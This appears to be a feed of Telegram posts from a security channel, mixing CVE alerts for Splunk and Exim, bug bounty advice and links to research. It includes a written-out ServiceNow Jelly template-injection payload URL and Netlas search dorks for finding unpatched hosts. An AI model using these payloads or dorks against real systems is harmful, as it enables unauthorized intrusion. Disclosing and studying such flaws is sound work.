Brut Security

⚠️CVE-2024-36991: Path Traversal on the “/modules/messaging/“ endpoint in Splunk Enterprise on Windows.

📣Sign Up On Netlas.io: https://app.netlas.io/ref/9cc61538/
📣Join Official Netlas Telegram: https://t.me/netlas

🔴In Splunk Enterprise versions below 9.2.2, 9.1.5, and 9.0.10, an attacker could perform a path traversal on the /modules/messaging/ endpoint in Splunk Enterprise on Windows.

✅PoC: https://github.com/bigb0x/CVE-2024-36991

ℹ️Netlas Dork: http.body:"splunk-Enterprise"

Please open Telegram to view this post

VIEW IN TELEGRAM

❤2👍1

2.58K viewsSaumadip Mandal, edited 10:50

Brut Security

2.28K viewsSaumadip Mandal, 19:08

Brut Security

📣Understanding Bug Bounty Hunting for Newcomers📣

🎁

Bug bounty hunting can seem appealing, but it’s important to know:

🖱High Skill Level Required: Success in bug bounty hunting demands a very high skill level. It's not just about using tools like Nuclei to scan public programs.

🖱Reality Check: Many see bug bounty hunting as a way to financial freedom or a high-paying job. However, if you have the skills to excel here, you can probably find other well-paying jobs in cybersecurity.

🖱Consider Your Location: Bug bounty hunting might be more attractive if you live in a country with a low average salary. Otherwise, it’s better pursued for fun or experience rather than as your main source of income.

🖱Extra Income and Experience: It can be great for earning extra money and gaining experience, but it’s not a reliable primary income source.

💳Bottom Line: Bug bounty hunting can be enjoyable and rewarding as a side activity, but it’s not the best choice for a main job once you understand the reality of the work involved.

Please open Telegram to view this post

VIEW IN TELEGRAM

👍3

2.38K viewsSaumadip Mandal, 19:19

Brut Security

🛠️Guide to Active Directory Hacking

📝Active Directory (AD) is a directory service developed by Microsoft to manage and store network information, offering a central location for access control and network security.

📰 Read more: https://en.iguru.gr/odigos-gia-active-directory-hacking/

🔖#infosec #cybersecurity #hacking #pentesting #security

2.27K viewsSaumadip Mandal, 19:29

Brut Security

0:09

This media is not supported in your browser

VIEW IN TELEGRAM

👨‍💻6👍3🤡2💯1

2.27K viewsSaumadip Mandal, 05:07

Brut Security

CVE-2024-39929: Bypass of attachment verification in Exim❗

Due to incorrect parsing of a multiline RFC 2231 header filename, an attacker can bypass attachment verification and send an executable payload to the victim.

Search at Netlas.io:
👉 Link: https://nt.ls/gRdtH
👉 Dork: smtp.banner:"Exim" NOT smtp.banner:"Exim 4.98"

Read more: https://bugs.exim.org/show_bug.cgi?id=3099#c4

3.14K viewsSaumadip Mandal, 13:09

Brut Security

👏3

2.35K viewsSaumadip Mandal, 05:05

Brut Security

Brut Security pinned «📣Understanding Bug Bounty Hunting for Newcomers📣 🎁Bug bounty hunting can seem appealing, but it’s important to know: 🖱High Skill Level Required: Success in bug bounty hunting demands a very high skill level. It's not just about using tools like Nuclei to…»

05:36

Brut Security

⚠️Template Injection on ServiceNow by @assetnote

⚠️

📌PoC:

http://1337/login.do?jvar_page_title=<style><j:jelly xmlns:j="jelly" xmlns:g='glide'><g:evaluate>gs.addErrorMessage(7*7);</g:evaluate></j:jelly></style>

😬

https://assetnote.io/resources/research/chaining-three-bugs-to-access-all-your-servicenow-data

🔖#bugbounty #bugbountytips #infosec

Please open Telegram to view this post

VIEW IN TELEGRAM

www.assetnote.io

Chaining Three Bugs to Access All Your ServiceNow Data

Through the course of 3/4 weeks, we were able to find a chain of vulnerabilities that allows full database access and full access to any MID servers configured. This resulted in 3 separate CVE's.

❤1👍1

2.13K viewsSaumadip Mandal, 06:52

Brut Security

🔥Year in Bug Bounties - from 0 to $25,700* in 12 months (Stats, Graphs, Learnings, Experiences & Plans!)🔥

🔗https://shreyaschavhan.notion.site/Year-in-Bug-Bounties-from-0-to-25-700-in-12-months-Stats-Graphs-Learnings-Experiences-Plan-9ccb71a21f874d71be9e112a52620a80

Please open Telegram to view this post